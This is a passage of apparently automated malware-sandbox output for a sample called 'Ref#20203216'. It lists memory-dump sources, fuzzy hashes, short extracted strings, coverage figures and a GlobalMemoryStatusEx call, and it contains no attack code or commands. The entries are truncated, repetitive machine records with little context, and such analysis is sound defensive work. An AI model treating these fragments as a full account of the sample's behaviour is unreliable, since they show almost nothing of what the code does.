                                                                                                  • Source File: 00000000.00000002.1756050114.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_15dd000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7d4e40813545decc6e1ba3eb76fe8e966b76b4b13d3bac6f467fd4b741a8ad69
                                                                                                  • Instruction ID: 36f60285ab24d1fe6783b2ef66fabfe76e8883c25dd279146aaef3846f417c58
                                                                                                  • Opcode Fuzzy Hash: 7d4e40813545decc6e1ba3eb76fe8e966b76b4b13d3bac6f467fd4b741a8ad69
                                                                                                  • Instruction Fuzzy Hash: 1FF062714043849EE7218A1EDC84B66FFA8EB51734F18C59AED484E2C6C279A844CB71
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1782455416.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7710000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 16cceb4915c75c1f0b44af5de453e6ad96f4ba29108c12e50943e744cecbdcec
                                                                                                  • Instruction ID: ee7b9ccaeab59af835674cbd46c52fb9853c71fd2774080dbb6f46e92f8287ba
                                                                                                  • Opcode Fuzzy Hash: 16cceb4915c75c1f0b44af5de453e6ad96f4ba29108c12e50943e744cecbdcec
                                                                                                  • Instruction Fuzzy Hash: F31190B494022A8FDB64DF28D988AEDB7F5BB49340F1584E9942DA3350DB349EC6CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1782455416.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7710000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: db3ab14c5a33d891116ca21b77c02de88838daf3aaf49301b14a9853e4181b24
                                                                                                  • Instruction ID: a93040b6fedf491f104ed8830a74fae0d9c4d405e39af7f17977d9c303719fd8
                                                                                                  • Opcode Fuzzy Hash: db3ab14c5a33d891116ca21b77c02de88838daf3aaf49301b14a9853e4181b24
                                                                                                  • Instruction Fuzzy Hash: A8112DB8A042198FDBA0DF58C884BADB7B5FB49304F1484E4D419A3740DB749EC5CF11
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7e8d2aed3cf0d9adf35f45dddc7784806dc76bffebf59f22ac8109175542259a
                                                                                                  • Instruction ID: 01057bfba4a3b693e836f35c0409f0519dc98dc58c457091faa168165a10aba9
                                                                                                  • Opcode Fuzzy Hash: 7e8d2aed3cf0d9adf35f45dddc7784806dc76bffebf59f22ac8109175542259a
                                                                                                  • Instruction Fuzzy Hash: 3FE092727046051FD314964E9840E17B7EEFBC8661B24806AF10DC7394D960DC018360
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5b6aa8ea09875b648ef0c39e73f382584a9c028852601d3a9020fec55b0f5de7
                                                                                                  • Instruction ID: 4d7047a81dc9ea5dcdbd39114b495e8df75d628d538622d55ec905c904e5e74f
                                                                                                  • Opcode Fuzzy Hash: 5b6aa8ea09875b648ef0c39e73f382584a9c028852601d3a9020fec55b0f5de7
                                                                                                  • Instruction Fuzzy Hash: FAF0A0B080E388EFDB02DBA4AD0495CBFB4EF42250B0444EBE448E7153E6741E0887A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1782455416.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7710000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: de2b639865667f804b73601bbe427ea51148a9ca9485712b77ddd74740b76aa4
                                                                                                  • Instruction ID: f85c36aaf3bf73b0704cf6dda80701ef8e9d97c4c0b12e2d72487f6c510758d4
                                                                                                  • Opcode Fuzzy Hash: de2b639865667f804b73601bbe427ea51148a9ca9485712b77ddd74740b76aa4
                                                                                                  • Instruction Fuzzy Hash: C8E0EDB4D04208EFCB44DFA8D5406ADFBF4EB48311F10C1AA9C2893340D6319E56EF84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1782455416.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7710000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: de2b639865667f804b73601bbe427ea51148a9ca9485712b77ddd74740b76aa4
                                                                                                  • Instruction ID: 9714683482919e382c62c2735bbe989f1e25c2160bb362aacf264979febf69e1
                                                                                                  • Opcode Fuzzy Hash: de2b639865667f804b73601bbe427ea51148a9ca9485712b77ddd74740b76aa4
                                                                                                  • Instruction Fuzzy Hash: D0E0C9B4D04208EFCB44DFA8D440AADBBF4EB48310F10C0A9981893340D6359A56DF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1782455416.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7710000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: de2b639865667f804b73601bbe427ea51148a9ca9485712b77ddd74740b76aa4
                                                                                                  • Instruction ID: 3a91b8b0f62856cd6c9ed42f28b2454cf61999768b941f112edfa4697ba69f5e
                                                                                                  • Opcode Fuzzy Hash: de2b639865667f804b73601bbe427ea51148a9ca9485712b77ddd74740b76aa4
                                                                                                  • Instruction Fuzzy Hash: 10E0EDB4E04208EFCB54DFA8D441AADFBF4EB48311F10C0AA9C1893341D631AA56DF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1782455416.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7710000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: de2b639865667f804b73601bbe427ea51148a9ca9485712b77ddd74740b76aa4
                                                                                                  • Instruction ID: be784eb756b3769619b6fb659161605f4f87c609218a89414c8fb20ad46e6152
                                                                                                  • Opcode Fuzzy Hash: de2b639865667f804b73601bbe427ea51148a9ca9485712b77ddd74740b76aa4
                                                                                                  • Instruction Fuzzy Hash: EEE0EDB4D04208EFCB44DFA8D5406ADFBF4EB48311F10C1AA9D18A3350D6319A56DF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e03b1f066c72bf6cfbe81958180cc36c5454727c0417b4c4ff9c0abafb3c1f9b
                                                                                                  • Instruction ID: 63a60b6aadde1dc35fe439b16554ca86be4d0d1b89dc3ad0c61ce301f1ecb43f
                                                                                                  • Opcode Fuzzy Hash: e03b1f066c72bf6cfbe81958180cc36c5454727c0417b4c4ff9c0abafb3c1f9b
                                                                                                  • Instruction Fuzzy Hash: AEE08674948108EBC704DF98D4459BDFFB8AB45311F10D099DD4457341CB719A45DB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1782455416.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7710000_Ref#20203216.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4'dq$4'dq
                                                                                                  • API String ID: 0-2306408947
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0.q$TJiq$jjjjjj$$dq$$dq
                                                                                                  • API String ID: 0-4277727295

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:12.1%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:25
                                                                                                  Total number of Limit Nodes:6

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-2331353128
                                                                                                  • Opcode ID: 360fbe38a91d6aa63fdcf5a87559e4bd03580cda418f1f8e5a1859955853cf09
                                                                                                  • Instruction ID: a8879b1170dbbaef3f23428272445d80af3e388f085a810c5afddb07038d18c4
                                                                                                  • Opcode Fuzzy Hash: 360fbe38a91d6aa63fdcf5a87559e4bd03580cda418f1f8e5a1859955853cf09
                                                                                                  • Instruction Fuzzy Hash: 0F321E31E1071ACFCB14EF75C85069DB7B6BF99300F61D669D409AB264EB30AE85CB90

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq
                                                                                                  • API String ID: 0-2340669324
                                                                                                  • Opcode ID: 1bf2426fd2d873041d32ffbfa1042bddd3428fef1a01d70ac2cf83410ece8c45
                                                                                                  • Instruction ID: 1c8f83b0ff4652cad626aa8b0524501c963a6948b55b431ed06e35c080b2bbbd
                                                                                                  • Opcode Fuzzy Hash: 1bf2426fd2d873041d32ffbfa1042bddd3428fef1a01d70ac2cf83410ece8c45
                                                                                                  • Instruction Fuzzy Hash: BE028D30B003159FDB54DB69DA90AAEB7E6FF84311F208929E409DB794DB31ED46CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-634254105
                                                                                                  • Opcode ID: b7f64fa36b74341638d91f13fb997dcd30145f3204f1382b68ee2d4eae06e495
                                                                                                  • Instruction ID: 896bb5f81752e04693361b3c1c3888cdfd6580690669e23e94693b756d9292e4
                                                                                                  • Opcode Fuzzy Hash: b7f64fa36b74341638d91f13fb997dcd30145f3204f1382b68ee2d4eae06e495
                                                                                                  • Instruction Fuzzy Hash: 24E18F30E1031A8FDB55DB69D4906AEB7F6FF85311F208929E809EB758DB319C42CB91
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-2331353128
                                                                                                  • Opcode ID: 74a304767cae59b597d8b86292bf706833d1b45763204a7ff3418be4b1e4246d
                                                                                                  • Instruction ID: 79f803e8c4dc9b9340494bbb7e519d8b97695d49118628eb88523c9c5f994b6b
                                                                                                  • Opcode Fuzzy Hash: 74a304767cae59b597d8b86292bf706833d1b45763204a7ff3418be4b1e4246d
                                                                                                  • Instruction Fuzzy Hash: 15029F70E1030A8FDB64CB69D5906ADB7F6FB45310F20892AE409DBA59EB34DD51CB81

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-185584874
                                                                                                  • Opcode ID: fb98725100ee3b55ce0361b0d81ea19a4216732ed0e222dbbebe54889f2d8032
                                                                                                  • Instruction ID: 3568c984a2fbb78c1648dad17ec041baeb0de89c890c346a465966a0dc57fbe8
                                                                                                  • Opcode Fuzzy Hash: fb98725100ee3b55ce0361b0d81ea19a4216732ed0e222dbbebe54889f2d8032
                                                                                                  • Instruction Fuzzy Hash: 2B915270B0031A9FDB54DF65D9907AEB7F6AFC4600F208569D80DEB788EA709D428B91

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq
                                                                                                  • API String ID: 0-2861643491
                                                                                                  • Opcode ID: 0c45c15c984d3b0c30769967aa3a0c602af5ecf00bd4287523a6529b728edeee
                                                                                                  • Instruction ID: 78c6de67c8a9fc56e73e981000c169ea1283bca397fd455d5dbd2050f817746a
                                                                                                  • Opcode Fuzzy Hash: 0c45c15c984d3b0c30769967aa3a0c602af5ecf00bd4287523a6529b728edeee
                                                                                                  • Instruction Fuzzy Hash: 5F624E30B0031A8FCB54EB69D590A5EB7E2FF84315B208A69E419DF758DB71ED46CB80

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: fiq$XPiq$\Oiq
                                                                                                  • API String ID: 0-1639307521
                                                                                                  • Opcode ID: 5165851d988ecd65dfd521a0449434b5d69b87f11dbfbace932c4e1a6a19a3cd
                                                                                                  • Instruction ID: c2af62d2eab0f54d5db98c71ee44ab79c9354bace8fac9828bd2a66cab449f1c
                                                                                                  • Opcode Fuzzy Hash: 5165851d988ecd65dfd521a0449434b5d69b87f11dbfbace932c4e1a6a19a3cd
                                                                                                  • Instruction Fuzzy Hash: E0617E70F003099FEB549FA5C8547AEBAFAFB88700F208529E10AEB395DA755C458B91

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq
                                                                                                  • API String ID: 0-2340669324

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: fiq$XPiq
                                                                                                  • API String ID: 0-1767242014

                                                                                                  Control-flow Graph (graph not reproduced; one node is labelled GlobalMemoryStatusEx)
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2955143037.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_12a0000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:

                                                                                                  APIs
                                                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 012AEAEF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2955143037.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_12a0000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                  • String ID:
                                                                                                  • API String ID: 1890195054-0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PHdq
                                                                                                  • API String ID: 0-2991842255
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PHdq
                                                                                                  • API String ID: 0-2991842255
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PHdq
                                                                                                  • API String ID: 0-2991842255
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq
                                                                                                  • API String ID: 0-847773763
                                                                                                  • Instruction Fuzzy Hash: B951B170B203159BEFA45A6DE854B7F269FD789311F20442AE50AC3B95CB3DCD4193A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 431ebb54156bd66a2709c0be8be9d18ed8afb7e0c23a27681d11eeedc65dd1a2
                                                                                                  • Instruction ID: 113e25e4a59b0bf5db17a8f49e14154c17f53dde81ccc277273cacf0396d4241
                                                                                                  • Opcode Fuzzy Hash: 431ebb54156bd66a2709c0be8be9d18ed8afb7e0c23a27681d11eeedc65dd1a2
                                                                                                  • Instruction Fuzzy Hash: 9A519170B203159BEFA06AADE85477E269FD789311F204426E50ED3B98CB3DCD819392
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 77be1d12288d259f350f4c301888cfc365d872b12122eb98708f62b81bce1239
                                                                                                  • Instruction ID: 32efb8aca8a703a117a75ee0fdf5e303e10865db8e44d4476d6ea11f5eebf442
                                                                                                  • Opcode Fuzzy Hash: 77be1d12288d259f350f4c301888cfc365d872b12122eb98708f62b81bce1239
                                                                                                  • Instruction Fuzzy Hash: 93414F71E007098FDB70CFAAD885AAFF7B6EB84310F21492AE156D7A50D330E955CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d7dffb1a14f5c60e878187e86b95d03085c8150d0f1fc6b2c3cea9327e90d725
                                                                                                  • Instruction ID: 9069e2ee63f4953aa2a33b51a9b5a64d4a480cddf149396dcb1f7a9767172a6f
                                                                                                  • Opcode Fuzzy Hash: d7dffb1a14f5c60e878187e86b95d03085c8150d0f1fc6b2c3cea9327e90d725
                                                                                                  • Instruction Fuzzy Hash: 2131B430E106199FCB44DFA5C88069EB7B6FF89710F20C528E806EB754EB71AD46CB40
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ee231c3061109353cbb0b32d89264ecfdcf359a64727b6e93f7a35642f87e10c
                                                                                                  • Instruction ID: e91d92c3ca56cb1c3c2a947eed8d909a8282b23172307bcf58c4e27db3b1b803
                                                                                                  • Opcode Fuzzy Hash: ee231c3061109353cbb0b32d89264ecfdcf359a64727b6e93f7a35642f87e10c
                                                                                                  • Instruction Fuzzy Hash: B2018131B102155FDB65966E985072BB2DFDBC9621F30D839F20EC7744ED65DC024391
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 807a09c1938589988a95225d3b57c924db59e5f1ae8ff851587bc33bfe261699
                                                                                                  • Instruction ID: 9fe64360495d7db28c4fcc050703c42453bd235938e778bca0e7e6ceb1a7105e
                                                                                                  • Opcode Fuzzy Hash: 807a09c1938589988a95225d3b57c924db59e5f1ae8ff851587bc33bfe261699
                                                                                                  • Instruction Fuzzy Hash: 6101A435B141164FCBA5962D945473F67DBD7C9620F20C839F50EC7744ED21DC024381
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 843b952280fc0703afc8f1afecf671346f800c11293750fd46aba48da484b9ac
                                                                                                  • Instruction ID: 1fd37ff5659e2d7d43d20c55146b00f8de97fac558b834847e384fb515f426eb
                                                                                                  • Opcode Fuzzy Hash: 843b952280fc0703afc8f1afecf671346f800c11293750fd46aba48da484b9ac
                                                                                                  • Instruction Fuzzy Hash: 54013130B102154FDB50AA6DD864B2F73DADB85621F208928F50EDB744EE21DC4287C5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 13c208710eb894ae59591056d562ae25d06f87e19baef09703f5eecc90add328
                                                                                                  • Instruction ID: 997df96ac24825db330519190e77da71c4bfd70aa1bfe6df5fe7380f0d5be85f
                                                                                                  • Opcode Fuzzy Hash: 13c208710eb894ae59591056d562ae25d06f87e19baef09703f5eecc90add328
                                                                                                  • Instruction Fuzzy Hash: 8BF092709093886FDF50CF758A4574ABBBDDB43208F2188E5E444CB902E576CE01D792
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-3623093008
                                                                                                  • Opcode ID: b14cc5ccb7ef601209c8cb13d0d77dd2efa22fb6da7241582f75f0b191ef74fc
                                                                                                  • Instruction ID: 3e98236bda1f9b607844c21dcc628cd87ddf4374eb9a77c36e0859034e34894e
                                                                                                  • Opcode Fuzzy Hash: b14cc5ccb7ef601209c8cb13d0d77dd2efa22fb6da7241582f75f0b191ef74fc
                                                                                                  • Instruction Fuzzy Hash: 4D121D30E00319CFDB64DFA5D954AAEB7B6BF88305F208969E409AB764DB309D41CF90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-634254105
                                                                                                  • Opcode ID: 6211b5027d8986ba05b220b13dfd10d8433c2fee94ad167326430e05a3b689a1
                                                                                                  • Instruction ID: bf867642af65f19dbd9d3d19891cfb34d5d9ce8e898f7ef6f24d3d2360058535
                                                                                                  • Opcode Fuzzy Hash: 6211b5027d8986ba05b220b13dfd10d8433c2fee94ad167326430e05a3b689a1
                                                                                                  • Instruction Fuzzy Hash: 26916D30A103099FEB64DF66D554BAEB7F6FF84301F208529F806AB694DB749D41CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2970426231.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_6960000_Ref#20203216.jbxd
                                                                                                  Similarity
